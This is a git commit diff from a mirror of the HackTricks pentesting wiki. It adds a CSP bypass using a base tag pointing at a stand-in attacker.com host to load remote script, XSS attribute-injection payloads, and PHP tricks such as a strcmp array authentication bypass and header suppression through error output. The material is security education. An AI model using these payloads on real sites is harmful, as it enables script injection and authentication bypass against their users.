mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [#3070] No subject
This commit is contained in:
parent
a7086a6c4a
commit
5346a4c5e6
8 changed files with 31 additions and 16 deletions
BIN
.gitbook/assets/image (465) (2) (1).png
Normal file
BIN
.gitbook/assets/image (465) (2) (1).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.7 MiB |
Binary file not shown.
Before Width: | Height: | Size: 1.7 MiB After Width: | Height: | Size: 34 KiB |
Binary file not shown.
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 111 KiB |
|
@ -194,6 +194,17 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
|
||||||
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
### missing **base-uri**
|
||||||
|
|
||||||
|
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](dangling-markup-html-scriptless-injection.md).
|
||||||
|
|
||||||
|
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
|
||||||
|
****If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
|
||||||
|
|
||||||
|
```html
|
||||||
|
<base href="https://www.attacker.com/">
|
||||||
|
```
|
||||||
|
|
||||||
### AngularJS events
|
### AngularJS events
|
||||||
|
|
||||||
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
|
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
|
||||||
|
|
|
@ -202,8 +202,9 @@ If you just think that **it's impossible to create an HTML tag with an attribute
|
||||||
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
|
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
|
||||||
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
|
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
|
||||||
|
|
||||||
```javascript
|
```bash
|
||||||
" autofocus onfocus=alert(document.domain) x="
|
" autofocus onfocus=alert(document.domain) x="
|
||||||
|
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Style events
|
#### Style events
|
||||||
|
|
|
@ -55,7 +55,7 @@ var_dump(in_array(0, $values, true));
|
||||||
//False
|
//False
|
||||||
```
|
```
|
||||||
|
|
||||||
### **strcmp()/**strcasecmp()
|
### strcmp()/strcasecmp()
|
||||||
|
|
||||||
If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
|
If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
|
||||||
|
|
||||||
|
@ -133,17 +133,13 @@ $obfs += ""; //int 7
|
||||||
|
|
||||||
## More tricks
|
## More tricks
|
||||||
|
|
||||||
**register\_globals**: En PHP < 4.1.1 o si se ha configurado mal puede ser que las register\_globals estén activas (o se esté imitando su comportamiento). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código.
|
* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. 
|
||||||
|
* The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
|
||||||
|
This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
|
||||||
|
* When you have the **usernames** of the users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
|
||||||
|
* [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)
|
||||||
|
|
||||||
Las **variables de sesión** (asociadas al **PHPSESSION**) de un dominio se guardan en el mismo sitio, por lo tanto si dentro de un dominio se usan distintas cookies en distintos paths se puede hacer que un path acceda a la cookie del otro accediendo a dicho path con la cookie del otro. De esta forma si los dos paths acceden a una variable con el mismo nombre puedes hacer que el valor de dicha variable en el path1 se aplique al path2. Y entonces el path2 tomará como válidas las variables del path1 (al ponerle a la cookie el nombre que le corresponde en el path2).
|
### password\_hash/password\_verify
|
||||||
|
|
||||||
Dos usuarios generados a la vez pueden tener la misma cookie (si la cookie depende del tiempo).
|
|
||||||
|
|
||||||
When you have the **usernames** of teh users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
|
|
||||||
|
|
||||||
****[**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)****
|
|
||||||
|
|
||||||
### **password\_hash/**password\_verify
|
|
||||||
|
|
||||||
This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
|
This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
|
||||||
The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
|
The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
|
||||||
|
@ -156,6 +152,13 @@ $cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("
|
||||||
True
|
True
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### HTTP headers bypass abusing PHP errors
|
||||||
|
|
||||||
|
If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
|
||||||
|
In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
|
||||||
|
|
||||||
|
![](<../../../.gitbook/assets/image (465).png>)
|
||||||
|
|
||||||
## Code execution
|
## Code execution
|
||||||
|
|
||||||
**system("ls");**\
|
**system("ls");**\
|
||||||
|
@ -270,7 +273,7 @@ echo "$x ${Da}"; //Da Drums
|
||||||
|
|
||||||
## Xdebug unauthenticated RCE
|
## Xdebug unauthenticated RCE
|
||||||
|
|
||||||
If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) 
|
If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
|
||||||
|
|
||||||
## Execute PHP without letters
|
## Execute PHP without letters
|
||||||
|
|
||||||
|
|
|
@ -55,7 +55,7 @@ To connect with the bus pirate you can follow the docs:
|
||||||
|
|
||||||
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
|
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (465) (2).png>)
|
![](<../../.gitbook/assets/image (465) (2) (1).png>)
|
||||||
|
|
||||||
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
|
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
|
||||||
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
|
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
|
||||||
|
|
|
@ -14,7 +14,7 @@ In settings (the second tab button) you can select the **SDR device** or **selec
|
||||||
|
|
||||||
In the GUI behaviour it's recommended to enable a few things if your PC support it:
|
In the GUI behaviour it's recommended to enable a few things if your PC support it:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (465).png>)
|
![](<../../.gitbook/assets/image (465) (2).png>)
|
||||||
|
|
||||||
{% hint style="info" %}
|
{% hint style="info" %}
|
||||||
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
|
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
|
||||||
|
|
Loading…
Reference in a new issue